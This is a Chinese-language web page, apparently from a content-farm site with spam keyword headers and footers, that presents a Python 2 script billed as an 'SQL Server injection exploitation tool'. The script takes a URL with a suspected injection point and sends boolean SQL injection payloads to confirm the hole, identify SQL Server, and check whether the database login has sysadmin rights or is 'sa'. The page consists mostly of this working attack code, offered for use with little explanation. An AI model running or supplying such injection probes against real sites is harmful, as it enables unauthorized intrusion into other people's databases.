国产99久久精品_欧美日本韩国一区二区_激情小说综合网_欧美一级二级视频_午夜av电影_日本久久精品视频

最新文章專題視頻專題問答1問答10問答100問答1000問答2000關鍵字專題1關鍵字專題50關鍵字專題500關鍵字專題1500TAG最新視頻文章推薦1 推薦3 推薦5 推薦7 推薦9 推薦11 推薦13 推薦15 推薦17 推薦19 推薦21 推薦23 推薦25 推薦27 推薦29 推薦31 推薦33 推薦35 推薦37視頻文章20視頻文章30視頻文章40視頻文章50視頻文章60 視頻文章70視頻文章80視頻文章90視頻文章100視頻文章120視頻文章140 視頻2關鍵字專題關鍵字專題tag2tag3文章專題文章專題2文章索引1文章索引2文章索引3文章索引4文章索引5123456789101112131415文章專題3
問答文章1 問答文章501 問答文章1001 問答文章1501 問答文章2001 問答文章2501 問答文章3001 問答文章3501 問答文章4001 問答文章4501 問答文章5001 問答文章5501 問答文章6001 問答文章6501 問答文章7001 問答文章7501 問答文章8001 問答文章8501 問答文章9001 問答文章9501
當前位置: 首頁 - 科技 - 知識百科 - 正文

Python編寫檢測數據庫SA用戶的方法

來源:懂視網 責編:小采 時間:2020-11-27 14:38:20
文檔

Python編寫檢測數據庫SA用戶的方法

Python編寫檢測數據庫SA用戶的方法:本文講述一個用Python寫的小程序,用于有注入點的鏈接,以檢測當前數據庫用戶是否為sa,詳細代碼如下: # Code by zhaoxiaobu Email: little.bu@hotmail.com #-*- coding: UTF-8 -*- from sys import exit from urll
推薦度:
導讀Python編寫檢測數據庫SA用戶的方法:本文講述一個用Python寫的小程序,用于有注入點的鏈接,以檢測當前數據庫用戶是否為sa,詳細代碼如下: # Code by zhaoxiaobu Email: little.bu@hotmail.com #-*- coding: UTF-8 -*- from sys import exit from urll

本文講述一個用Python寫的小程序,用于有注入點的鏈接,以檢測當前數據庫用戶是否為sa,詳細代碼如下:

# Code by zhaoxiaobu Email: little.bu@hotmail.com 
#-*- coding: UTF-8 -*- 
from sys import exit 
from urllib import urlopen 
from string import join,strip 
from re import search 
 
def is_sqlable(): 
 sql1="%20and%201=2" 
 sql2="%20and%201=1" 
 urlfile1=urlopen(url+sql1) 
 urlfile2=urlopen(url+sql2) 
 htmlcodes1=urlfile1.read() 
 htmlcodes2=urlfile2.read() 
 if not search(judge,htmlcodes1) and search(judge,htmlcodes2): 
 print "[信息]恭喜!這個URL是有注入漏洞的!n" 
 print "[信息]現在判斷數據庫是否是SQL Server,請耐心等候....." 
 is_SQLServer() 
 else: 
 print "[錯誤]你確定這個URL能用?換個別的試試吧!n"

def is_SQLServer(): 
 sql = "%20and%20exists%20(select%20*%20from%20sysobjects)" 
 urlfile=urlopen(url+sql) 
 htmlcodes=urlfile.read() 
 if not search(judge,htmlcodes): 
 print "[錯誤]數據庫好像不是SQL Server的!n" 
 else: 
 print "[信息]確認是SQL Server數據庫!n" 
 print "[信息]開始檢測當前數據庫用戶權限,請耐心等待......" 
 is_sysadmin() 
 
 
def is_sysadmin(): 
 sql = "%20and%201=(select%20IS_SRVROLEMEMBER('sysadmin'))" 
 urlfile = urlopen(url+sql) 
 htmlcodes = urlfile.read() 
 if not search(judge,htmlcodes): 
 print "[錯誤]當前數據庫用戶不具有sysadmin權限!n" 
 else: 
 print "[信息]當前數據庫用戶具有sysadmin權限!n" 
 print "[信息]檢測當前用戶是不是SA,請耐心等待......" 
 is_sa() 
 
def is_sa(): 
 sql = "%20and%20'sa'=(select%20System_user)"; 
 urlfile = urlopen(url+sql) 
 htmlcodes = urlfile.read() 
 if not search(judge,htmlcodes): 
 print "[錯誤]當前數據庫用戶不是SA!n" 
 else: 
 print "[信息]當前數據庫用戶是SA!n" 
 
print "n########################################################################n" 
print " ^o^SQL Server注入利用工具^o^ " 
print " Email: little.bu@hotmail.comn" 
print "========================================================================"; 
url = raw_input('[信息]請輸入一個可能有注入漏洞的鏈接!nURL:') 
if url == '': 
 print "[錯誤]提供的URL必須具有 '.asp?xxx=' 這樣的格式" 
 exit(1) 
 
judge = raw_input("[信息]請提供一個判斷字符串.n判斷字符串:") 
if judge == '': 
 print "[錯誤]判斷字符串不能為空!" 
 exit(1) 
 
is_sqlable()

聲明:本網頁內容旨在傳播知識,若有侵權等問題請及時與本網聯系,我們將在第一時間刪除處理。TEL:177 7030 7066 E-MAIL:11247931@qq.com

文檔

Python編寫檢測數據庫SA用戶的方法

Python編寫檢測數據庫SA用戶的方法:本文講述一個用Python寫的小程序,用于有注入點的鏈接,以檢測當前數據庫用戶是否為sa,詳細代碼如下: # Code by zhaoxiaobu Email: little.bu@hotmail.com #-*- coding: UTF-8 -*- from sys import exit from urll
推薦度:
標簽: 方法 用戶 數據
  • 熱門焦點

最新推薦

猜你喜歡

熱門推薦

專題
Top
主站蜘蛛池模板: 国产成人三级经典中文 | 91国内精品久久久久免费影院 | 精品久久一区二区三区 | 国产综合精品久久久久成人影 | 欧美色图第一页 | 欧美日韩亚洲视频 | 久久无码av三级 | 欧美日韩一二区 | 亚洲欧美一区二区三区久久 | 中文字幕精品一区二区精品 | 成人久久久精品乱码一区二区三区 | 免费观看性欧美大片 | 国产日韩欧美高清 | 一本久久精品一区二区 | 国产精品视频久久久 | 精品在线免费播放 | 国产成人亚洲欧美三区综合 | 精品视频一区二区三区四区五区 | 欧美在线一区二区三区精品 | 国产日韩亚洲欧美 | 99久久精品国产一区二区三区 | 国产精品久久久久毛片 | 国产一级持黄大片99久久 | 久久精品免费一区二区视 | 日本一区二区三区在线观看 | 国产精品久久久久久久久免费 | 日韩专区亚洲综合久久 | 99精品国产成人一区二区 | 好骚综合在线 | 日韩色区| 最新中文字幕第一页 | 国产成人精品三级在线 | 午夜精品视频在线观看 | 欧美成人精品一级高清片 | 午夜精品久久久久久91 | 国产亚洲视频在线 | 欧美另类在线观看 | 国产精品久久久久久久免费 | 久久久久久91精品色婷婷 | 国产一区二区三区免费在线视频 | 国产成人精品999在线观看 |